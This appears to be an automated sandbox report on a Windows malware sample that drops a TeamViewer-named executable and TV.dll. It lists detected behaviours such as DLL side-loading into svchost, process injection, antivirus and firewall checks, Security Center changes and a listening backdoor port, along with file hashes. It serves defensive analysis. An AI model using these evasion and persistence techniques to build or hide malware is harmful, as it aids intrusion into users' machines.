Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 3_2_6EAFC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6EAFC1E2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0051523A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0053496B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00534A9B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: 6_2_6EAFC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_6EAFC1E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_6EAFC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_6EAFC1E2

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected

Source: C:\Windows\SysWOW64\svchost.exe

Section loaded: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll

Jump to behavior

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_6EAF5130 LogonUserW,GetLastError,CloseHandle,

3_2_6EAF5130

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f

Jump to behavior

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

3_2_6EAF3390

Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,InvertRect,InvertRect,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,	3_2_6EAF6D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: GetLocaleInfoA,_xtoa_s@20,	6_2_0054113A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: GetLocaleInfoA,	6_2_0054E79D
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: _LcidFromHexString,GetLocaleInfoA,	6_2_0054E87F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	6_2_0054E915
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: GetLocaleInfoA,	6_2_0054D9D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_0054E987
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_0054EB57
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_0054EC7B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_0054EC16
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	6_2_0054ECB7
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,	6_2_6EAF6D50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,	8_2_6EAF6D50

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Code function: 3_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_0054B459

Source: C:\Users\user\Desktop\77Etc0bR2v.exe

Code function: 1_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,753CA680,lstrcat,lstrlen,

1_2_00405B88

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

3_2_6EAF8510

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

AV process strings found (often used to terminate AV products)

Source: svchost.exe, 0000000E.00000002.510485370.000001B2F323D000.00000004.00000001.sdmp	Binary or memory string: "@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.510602015.000001B2F3302000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

6_2_00511D6F

ID:	483795
Product:	CloudBasic
Start time:	13:50:07
Start date:	15.09.2021
Sample:	77Etc0bR2v.bin
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	e71e3b995477081569ed357e4d403666
SHA1:	809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
SHA256:	94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
Filetype:	Win32 Executable (generic) a (10002005/4) 92.16%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	4CB285EEFF119D1DFD0BC97E94936906	A7EA66C77EF4E8563579DF5AC2728AE57DD66F22	737CE3AFFB100886870E7B2FFE3652436A7B98FF9C555A27B6F3103D48C98ACA
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage engine DataBase, version 0x620, checksum 0x87a573cd, page size 16384, DirtyShutdown, Windows version 10.0	10044699896FCD83E6D2AACF7AD018CC	979085BC69FF906EB595D3B29B220897323B645A	CFFBDCB3DE8A841FCAFBBC46D4C4D5CC7A3F9AE642560A02E0EAB93955D76165
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	CA6DBB540336CC98DD443DEEE720D3A0	5043896148059D34A2CDC487DE4B6A8B67EE37EA	1DA6B97F07296A4ECCA7F59CD7B4D9259E620609470AFC85436843439B8AAB9F
C:\Users\user\AppData\Local\Temp\nsa6985.tmp	data	E29F152B606F9669680D7CB24308991A	680CC154C050B90FEA35AD0FDB97E387D62B7740	FF1A9205BD8076DE3811E5417AC2AEAC44D940F392B19C9D8A2833493CC8034F
C:\Users\user\AppData\Roaming\TeamViewer\TV.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	A44F2649C82B35D42E6036D1C75E48C4	EE3B00701C97ED107B78ECBDF9D962F1508EDC8E	760945429F7EA52C40C75A0FA0424D943E317EC48575C812545CC2C4BE5B0510
C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe	PE32 executable (GUI) Intel 80386, for MS Windows	EBDBA07BFABCF24F5D79EF27247EA643	A3A7498F02BAB188B3944382BBA4D016D63607D1	D2CDCA8EFA27089D3DEAD0CCEAFBE470B3815C9C2A362C007D1F516E5379AC92
C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.ini	data	3A763054AEBA6DD14BFFC07A9668E0A9	ABA2EB735B1F9375BBC3CEFC9E44797E6448A4C4	F8C4590C3B29AEBCE5530ECB5C1E59CAD18E50651310ECF2331ECBCDF6BC922C
C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	554EE592B125CFDF81B376B5C24AA61C	666D2C04171246734575D4453289AA2D9AF93B97	B296EF421D5B7F569E623D41A42D87A064C4358CFA89A192988F854929E3ABD1
C:\Users\user\AppData\Roaming\TeamViewer\vpn.cab	Microsoft Cabinet archive data, 71196 bytes, 8 files	8A84AA1B9F20DC194947D7AC592D818E	4A77AB0D59F39BF600BB89D9121446F6AA2D139B	8A740BE5D92B734E77B210354988DFD49F31C49814240513CF4B0353A8CE6DFB
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	ASCII text, with no line terminators	DCA83F08D448911A14C22EBCACC5AD57	91270525521B7FE0D986DB19747F47D34B6318AD	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log	data	0EAC1BAA62604D45C05D6FD1407B4089	2D25DA7AFE0015AE800B53C76B6A4C7D61C4002B	EDD329DE78C018022DD968702A2EEABE7D4C215302AB63798FFA681A02999351

Windows Analysis Report 77Etc0bR2v.bin

Overview

General Information

Detection

Compliance

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Privilege Escalation:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Protection of GUI:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs